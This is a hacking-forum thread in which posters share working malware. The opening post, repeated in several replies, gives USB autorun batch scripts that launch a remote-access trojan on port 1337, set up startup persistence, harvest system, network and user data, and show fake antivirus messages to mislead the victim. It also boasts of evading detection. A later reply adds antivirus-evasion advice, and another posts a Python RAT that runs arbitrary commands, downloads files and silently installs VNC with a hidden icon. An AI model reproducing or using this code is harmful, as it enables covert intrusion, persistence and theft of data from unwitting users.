Jump to content

usb hack...


Pizza

Recommended Posts

Programs used

Notepad to write batch scripts

WindowsRAT.exe to open port 1337

IExpress to make the file and command(windowsrat.exe 1337) run in background

http://virusscan.jotti.org/en/scanresult/5...ce1299d7fa9507e

http://www.virustotal.com/analisis/120844c...366e-1245102553

not detected.

this is just a basic thing.

autorun.bat this will start when you plug in the usb drive (there is a autorun.inf on it but if computer has autorun disabled this is the file you should start)

@echo off
start /min launch.exe
cls
start /min launch.bat
cls
exit

launch.exe has windowsrat.exe ( i did not write this i downloaded this from somewhere i think its from packet storm ) i used iexpress and put windowsrat.exe in it and it will run in background, the command windowsrat.exe 1337 is executed server is on port 1337 now you can connect to it using telnet.

launch.bat this will be minimized but just incase someone opens the window it will have false messages. this you can see puts launch.exe in system32 and copies startupsystem.bat to users startup folder. this also collects ip address and then you can telnet to that ip address and port 1337

echo off
copy launch.exe C:\Windows\System32
cls
copy startupsystem.bat "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup"
cls
mkdir \Information\%USERNAME%
cls
Echo Anti-Virus Portable
systeminfo > \Information\%USERNAME%\%USERNAME%sysinfo.txt
cls
Echo Anti-Virus Portable
arp -a > \Information\%USERNAME%\%USERNAME%arp.txt
cls
Echo Searching and Removing Virus
netstat -a > \Information\%USERNAME%\%USERNAME%netstat.txt
cls
Echo Searching and Removing Virus
ipconfig > \Information\%USERNAME%\%USERNAME%ipconfig.txt
cls
Echo Searching and Removing Virus
tasklist > \Information\%USERNAME%\%USERNAME%task.txt
cls
Echo Searching and Removing Virus
net group > \Information\%USERNAME%\%USERNAME%group.txt
cls
Echo Searching and Removing Virus
net localgroup > \Information\%USERNAME%\%USERNAME%localgroup.txt
cls
Echo Searching and Removing Virus
net share > \Information\%USERNAME%\%USERNAME%share.txt
cls
Echo Searching and Removing Virus
net use > \Information\%USERNAME%\%USERNAME%use.txt
cls
Echo Searching and Removing Virus
net user > \Information\%USERNAME%\%USERNAME%users.txt
cls
Echo No Virus Found
net view > \Information\%USERNAME%\%USERNAME%view.txt
Echo No Virus Found
cls
exit

startupsystem.bat this will start launch.exe when computer startups and this user logs in i tried to make it a service but i couldnt...if you can you should do that.

start launch.exe
exit

removal.bat it deletes launch.exe from sys32 and deletes startupsystem.bat...

@echo off
del "C:\Windows\System32\Launch.exe"
cls
del "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\startupsystem.bat"
cls
exit

you should have autorun disabled. and monitor your startup folder i think some anti spyware do it but its good if you check it.

i am not a coder, but if you are you can improve this..DO IT.

Download: http://www.2shared.com/file/6329193/806de49d/USBHACK.html

-Pizza (aka JPizza)

Link to comment
Share on other sites

Programs used

Notepad to write batch scripts

WindowsRAT.exe to open port 1337

IExpress to make the file and command(windowsrat.exe 1337) run in background

http://virusscan.jotti.org/en/scanresult/5...ce1299d7fa9507e

http://www.virustotal.com/analisis/120844c...366e-1245102553

not detected.

this is just a basic thing.

autorun.bat this will start when you plug in the usb drive (there is a autorun.inf on it but if computer has autorun disabled this is the file you should start)

@echo off
start /min launch.exe
cls
start /min launch.bat
cls
exit

launch.exe has windowsrat.exe ( i did not write this i downloaded this from somewhere i think its from packet storm ) i used iexpress and put windowsrat.exe in it and it will run in background, the command windowsrat.exe 1337 is executed server is on port 1337 now you can connect to it using telnet.

launch.bat this will be minimized but just incase someone opens the window it will have false messages. this you can see puts launch.exe in system32 and copies startupsystem.bat to users startup folder. this also collects ip address and then you can telnet to that ip address and port 1337

echo off
copy launch.exe C:\Windows\System32
cls
copy startupsystem.bat "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup"
cls
mkdir \Information\%USERNAME%
cls
Echo Anti-Virus Portable
systeminfo > \Information\%USERNAME%\%USERNAME%sysinfo.txt
cls
Echo Anti-Virus Portable
arp -a > \Information\%USERNAME%\%USERNAME%arp.txt
cls
Echo Searching and Removing Virus
netstat -a > \Information\%USERNAME%\%USERNAME%netstat.txt
cls
Echo Searching and Removing Virus
ipconfig > \Information\%USERNAME%\%USERNAME%ipconfig.txt
cls
Echo Searching and Removing Virus
tasklist > \Information\%USERNAME%\%USERNAME%task.txt
cls
Echo Searching and Removing Virus
net group > \Information\%USERNAME%\%USERNAME%group.txt
cls
Echo Searching and Removing Virus
net localgroup > \Information\%USERNAME%\%USERNAME%localgroup.txt
cls
Echo Searching and Removing Virus
net share > \Information\%USERNAME%\%USERNAME%share.txt
cls
Echo Searching and Removing Virus
net use > \Information\%USERNAME%\%USERNAME%use.txt
cls
Echo Searching and Removing Virus
net user > \Information\%USERNAME%\%USERNAME%users.txt
cls
Echo No Virus Found
net view > \Information\%USERNAME%\%USERNAME%view.txt
Echo No Virus Found
cls
exit

startupsystem.bat this will start launch.exe when computer startups and this user logs in i tried to make it a service but i couldnt...if you can you should do that.

start launch.exe
exit

removal.bat it deletes launch.exe from sys32 and deletes startupsystem.bat...

@echo off
del "C:\Windows\System32\Launch.exe"
cls
del "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\startupsystem.bat"
cls
exit

you should have autorun disabled. and monitor your startup folder i think some anti spyware do it but its good if you check it.

i am not a coder, but if you are you can improve this..DO IT.

Download: http://www.2shared.com/file/6329193/806de49d/USBHACK.html

-Pizza (aka JPizza)

add (this simple code :))

Title Anti-Virus Scanning...
Color 0a

For affect :)

Link to comment
Share on other sites

  • 3 weeks later...
  • 2 weeks later...
it will get detected more and more if you upload to virustotal as they distribute samples, for things like this you should use
hXXp://scanner.novirusthanks.org

and tick the do not distribute box ;)

thank you.

Link to comment
Share on other sites

Here is a RAT i have been working on in python. Its not done. Download Terry the Trojan and use that as the client to send/recieve data.

from Tkinter import *
 from tkMessageBox import *
 from ScrolledText import *
 import socket
 import sys

 portvar = 2727
 try:
     if sys.argv[1] == "/port":
         try:
             portvar = int(sys.argv[2])
         except:
             portvar = 2727
 except:
     portvar = 2727

 def std(string):
     stdbox.config(state=NORMAL)
     stdbox.insert(END,"" + string + "\n")
     stdbox.config(state=DISABLED)

 def cnnect(var="poo"):
     sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
     success = 1
     try:
         sockt.connect((ipbox.get(),portvar))
     except:
         success = 0
         std("Connection to " + ipbox.get() + " on port " + str(portvar) + " failed.")
     if success == 1:
         sockt.send(cmdbox.get())
         retdata = sockt.recv(2048)
         std(retdata)

 root = Tk()
 root.title("Terry the Trojan")
 #FRAMES
 ipfrm = Frame(root)
 ipfrm.pack()
 cmdfrm = Frame(root)
 cmdfrm.pack()
 stdfrm = Frame(root)
 stdfrm.pack()
 #IP/Port Entry Widgets
 Label(ipfrm,text="Host/IP adress:").grid(row=1,column=1)
 ipbox = Entry(ipfrm,width=50)
 ipbox.grid(row=1,column=2)
 #Returned output widgets
 stdbox = ScrolledText(stdfrm,width=70,height=20,state=DISABLED,bg="#c0c0c0",fg="#000000")
 stdbox.grid(row=1,column=1)
 #Command sending widgets
 cmdbox = Entry(cmdfrm,width=50)
 cmdbox.grid(row=1,column=1)
 Button(cmdfrm,text="Send Command",command=cnnect).grid(row=1,column=2)
 cmdbox.bind("<Return>",cnnect)
 root.mainloop()

HAH shit wrong code. Ill post it in a min.

OK HERE is the RAT, sorry about that. You should be able to tell what the commands do.

import socket,os,sys,urllib,re,ftplib
from time import sleep
port = 2727
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sockt.bind(('',port))
sockt.listen(1)
while True:
    channel, details = sockt.accept()
    command = channel.recv(2048)
    if command == "kill":
        channel.send("Server trojan has been closed.")
        sys.exit()
    elif command == "ip":
        connect = s.connect(("www.whatismyipaddress.com", 80))
        s.send('GET / HTTP/1.0\n\n')
        socketlines = s.recv(2048)
        lines = socketlines.split()
        ip = lines[len(lines) - 1]
        channel.send(ip)
    elif command == "whoami":
        channel.send(os.environ["USERNAME"])
    elif command == "drive":
        channel.send(os.environ["HOMEDRIVE"])
    elif command == "userfolder":
        channel.send(os.environ["HOMEPATH"])
    elif command == "installvnc":
        urllib.urlretrieve('http://downloads.sourceforge.net/vnc-tight/tightvnc-1.3.10-setup.exe','update.exe')
        fs=os.popen3('update.exe /sp- /verysilent','b')
        sleep(1)
        fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b')
        sleep(1)
        fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b')
        sleep(0.2)
        fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b')
        sleep(0.5)
        fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b')
        sleep(1)
        fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b')
        sleep(0.3)
        fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b')
        sleep(1)
        fs=os.popen3('net start "VNC Server"','b')
        fs=os.popen3('del update.exe','b')
        channel.send("VNC was installed, password is vncserv.")
    elif command == "netstat":
        fs=os.popen3('netstat -ano>windsys.ini','b')
        sleep(2)
        f = open('windsys.ini')
        channel.send(f.read())
        f.close()
    elif command == "whereami":
        channel.send(os.getcwd())
    elif command.startswith("download "):
        file = command.replace("download ", "")
        urllib.urlretrieve(file,"file.exe")
        channel.send("File downloaded. Saved as 'file.exe', rename extension")     
    else:
        csuc = 1
        try:
            fs=os.popen3(command,'b')
        except:
            csuc = 0
        if csuc == 1:
            channel.send("Command Sucessful")
        else:
            channel.send("Command Failed")
        channel.close()

Link to comment
Share on other sites

Programs used

Notepad to write batch scripts

WindowsRAT.exe to open port 1337

IExpress to make the file and command(windowsrat.exe 1337) run in background

http://virusscan.jotti.org/en/scanresult/5...ce1299d7fa9507e

http://www.virustotal.com/analisis/120844c...366e-1245102553

not detected.

this is just a basic thing.

autorun.bat this will start when you plug in the usb drive (there is a autorun.inf on it but if computer has autorun disabled this is the file you should start)

@echo off
start /min launch.exe
cls
start /min launch.bat
cls
exit

launch.exe has windowsrat.exe ( i did not write this i downloaded this from somewhere i think its from packet storm ) i used iexpress and put windowsrat.exe in it and it will run in background, the command windowsrat.exe 1337 is executed server is on port 1337 now you can connect to it using telnet.

launch.bat this will be minimized but just incase someone opens the window it will have false messages. this you can see puts launch.exe in system32 and copies startupsystem.bat to users startup folder. this also collects ip address and then you can telnet to that ip address and port 1337

echo off
copy launch.exe C:\Windows\System32
cls
copy startupsystem.bat "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup"
cls
mkdir \Information\%USERNAME%
cls
Echo Anti-Virus Portable
systeminfo > \Information\%USERNAME%\%USERNAME%sysinfo.txt
cls
Echo Anti-Virus Portable
arp -a > \Information\%USERNAME%\%USERNAME%arp.txt
cls
Echo Searching and Removing Virus
netstat -a > \Information\%USERNAME%\%USERNAME%netstat.txt
cls
Echo Searching and Removing Virus
ipconfig > \Information\%USERNAME%\%USERNAME%ipconfig.txt
cls
Echo Searching and Removing Virus
tasklist > \Information\%USERNAME%\%USERNAME%task.txt
cls
Echo Searching and Removing Virus
net group > \Information\%USERNAME%\%USERNAME%group.txt
cls
Echo Searching and Removing Virus
net localgroup > \Information\%USERNAME%\%USERNAME%localgroup.txt
cls
Echo Searching and Removing Virus
net share > \Information\%USERNAME%\%USERNAME%share.txt
cls
Echo Searching and Removing Virus
net use > \Information\%USERNAME%\%USERNAME%use.txt
cls
Echo Searching and Removing Virus
net user > \Information\%USERNAME%\%USERNAME%users.txt
cls
Echo No Virus Found
net view > \Information\%USERNAME%\%USERNAME%view.txt
Echo No Virus Found
cls
exit

startupsystem.bat this will start launch.exe when computer startups and this user logs in i tried to make it a service but i couldnt...if you can you should do that.

start launch.exe
exit

removal.bat it deletes launch.exe from sys32 and deletes startupsystem.bat...

@echo off
del "C:\Windows\System32\Launch.exe"
cls
del "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\startupsystem.bat"
cls
exit

you should have autorun disabled. and monitor your startup folder i think some anti spyware do it but its good if you check it.

i am not a coder, but if you are you can improve this..DO IT.

Download: http://www.2shared.com/file/6329193/806de49d/USBHACK.html

-Pizza (aka JPizza)

the download link is not working all i could see on that site is spam and advertising please upload to new site so i could download it thank you.

Link to comment
Share on other sites

i wrote a couple netcat clones in python.... i dont think ill release my code though cause i dont feel like having it ever get blacklisted by antivirus...

dingleberries... you should check out the twisted python library for more advanced networking capabillities its pretty nice to work with...

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...